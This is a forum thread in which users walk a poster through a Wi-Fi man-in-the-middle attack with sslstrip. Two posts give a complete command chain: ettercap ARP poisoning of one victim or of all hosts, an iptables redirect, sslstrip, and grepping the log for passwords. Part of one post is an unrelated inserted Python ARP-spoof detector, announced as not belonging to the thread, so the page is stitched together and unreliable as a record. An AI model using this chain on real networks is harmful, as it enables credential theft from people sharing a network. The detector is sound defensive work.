Thread: howto sslstrip in wlan?

  1. #1
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Question Howto MITM in a WLAN?

    hi there,

    following scenario:

    my homenetwork ->
    - wlan router (speedport 701)
    - eee 1000h (victim running WinXP, connected via wlan)
    - eee 1000h (attacker running BT4 or ubuntu 9.04, connected via wlan)

    If I connect the eee's with a wire to the router I can arpspoof the victim and then strip the SSL connection.
    But how do I do that in a WLAN network?
    If I arpspoof the WLAN victim it's cut off the network...
    I think it's because the victim thinks that I am the access point and not only the router.

    So how can i strip the ssl in a wlan connection?

    Edit:
    If I connect the victim and the attacker via cable it works...
    So it's not my dumbness!


    Edit2:

    Ok I thought about my thread and the problem is not how to sslstrip.
    The problem is how to do a MITM in a wlan!

  2. #2
    Junior Member waxlrose's Avatar
    Join Date
    Feb 2009
    Posts
    27

    Default

    not sure if you can do it on wlan protos

  3. #3

    Cool

    Quote Originally Posted by hardez

    Ok I thought about my thread and the problem is not how to sslstrip.
    The problem is how to do a MITM in a wlan!
    Check this out....
    Rogue Accesspoint + MitM Sniffing tutorial
    Code:
    http://forums.remote-exploit.org/showthread.php?t=19048

  4. #4
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.

    ettercap -T -q -i wlan0 -M arp /victim ip ie 192.169.0.101/ //

    -T is for just text, -q is for quit, -i is your interface, -M is MITM, arp is to arp em! If you don't know what the target ip is then nail em all.

    ettercap -T -q -i wlan0 -M arp // //

    Don't do this on a network with a zillion people on it.

    Not sure what card you have but you said wlan so I guess you have a Alfa or something like that.
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  5. #5

    Default

    To my knowledge, arpspoof is broken with reference to the network interface option. A patched version can be found HERE. I know this version of arpspoof will work fine over wireless for MITM.

  6. #6
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    If you don't feel like downloading the patched version of arpspoof that cypersnpr talks about, this is another way of doing what you want. The patched arpspoof works well.

    # echo "1" > /proc/sys/net/ipv4/ip_forward

    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    # python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)

    # ettercap -T -q -i wlan0 -M arp /target IP/ // ( /666.666.666.666/ // )

    # cat sslstrip.log | grep (ie pw, pass, login etc)
    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!
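    A defender's-side check for the ARP poisoning that posts #4 and #6 rely on, added here as example code that is not from this thread: a passive detector over a list of observed ARP replies that flags the router's IP being answered by a second MAC, which is exactly what every client on the WLAN can see while ettercap's arp MITM is running. The record format, IPs and MACs below are constructed sample data, not captured traffic.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple


class ArpReply(NamedTuple):
    """One observed ARP reply: 'ip is at mac' (constructed sample data)."""
    ts: float
    ip: str
    mac: str


def detect_arp_spoof(replies: List[ArpReply], gateway_ip: str) -> List[str]:
    """Flag the IP/MAC claim pattern produced by ARP poisoning.

    Rule 1: an IP answered by more than one MAC; the gateway IP is the
            high-value case because it diverts all outbound traffic.
    Rule 2: one MAC answering for several IPs, the two-sided poisoning
            of victim and router that a MITM needs.
    """
    macs_for_ip: Dict[str, Dict[str, float]] = defaultdict(dict)
    ips_for_mac: Dict[str, Dict[str, float]] = defaultdict(dict)
    for r in replies:                      # remember first-seen time only
        macs_for_ip[r.ip].setdefault(r.mac, r.ts)
        ips_for_mac[r.mac].setdefault(r.ip, r.ts)

    alerts: List[str] = []
    for ip, macs in macs_for_ip.items():
        if len(macs) > 1:
            by_time = sorted(macs, key=macs.get)   # oldest claim first
            tag = "GATEWAY" if ip == gateway_ip else "host"
            alerts.append(f"{tag} {ip}: first seen from {by_time[0]}, "
                          f"now also claimed by {by_time[-1]}")
    for mac, ips in ips_for_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims several IPs: " + ", ".join(sorted(ips)))
    return alerts


# Constructed sample: the real router and victim answer first, then a
# third MAC starts answering for both of them (the arp MITM pattern).
SAMPLE = [
    ArpReply(1.0, "192.168.0.1",   "00:11:22:aa:bb:01"),
    ArpReply(2.0, "192.168.0.101", "00:11:22:aa:bb:65"),
    ArpReply(9.0, "192.168.0.1",   "00:11:22:aa:bb:ff"),
    ArpReply(9.1, "192.168.0.101", "00:11:22:aa:bb:ff"),
]

if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE, "192.168.0.1"):
        print("ALERT:", line)
```

    On a real host the same rules can be fed from the output of a passive ARP sniffer, or simply from periodic snapshots of the local ARP cache, and a static ARP entry for the gateway removes the attack surface entirely.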

  7. #7
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    Ok tried it with ettercap, worked fine, BUT...

    As I started sslstrip all connections to http sites were blocked!
    https sites works.

    I tried it with

    Code:
     sslstrip -f -k -l 8080
    and with
    Code:
     sslstrip -p -f -l 8080
    but nothing works.

    If I stop sslstrip the connection works.

    Ideas?

    EDIT:
    This is done under Ubuntu 9.04, didn't try it with BT4
    But in my opinion it should work there too...


    EDIT2:
    Just tried it in BT4 and it works...
    But WHY?!
    Why does it work in BT and not in Ubuntu 9.04?

  8. #8
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    even with the patched version of arpspoof i still had probs.

    ettercap is much better to use, and worked like a charm.

    hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.

    think duel FON
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  9. #9

    Default

    Quote Originally Posted by vvpalin
    even with the patched version of arpspoof i still had probs.

    ettercap is much better to use, and worked like a charm.

    hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.

    think duel FON
    I've had the same type of issue with metasploit...it worked fine in BT, but not so well on Sidux. Really makes you appreciate the devs.
    "You can get more with a kind word and a gun than you can with a kind word alone."
    - Al Capone

  10. #10
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default

    Quote Originally Posted by onryo
    Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.

    ettercap -T -q -i wlan0 -M arp /victim ip ie 192.169.0.101/ //
    hallelujah!

    I prepared everything in my last war games and then arpspoof (the easiest part) didn't work. It was awful
    Auswaertsspiel
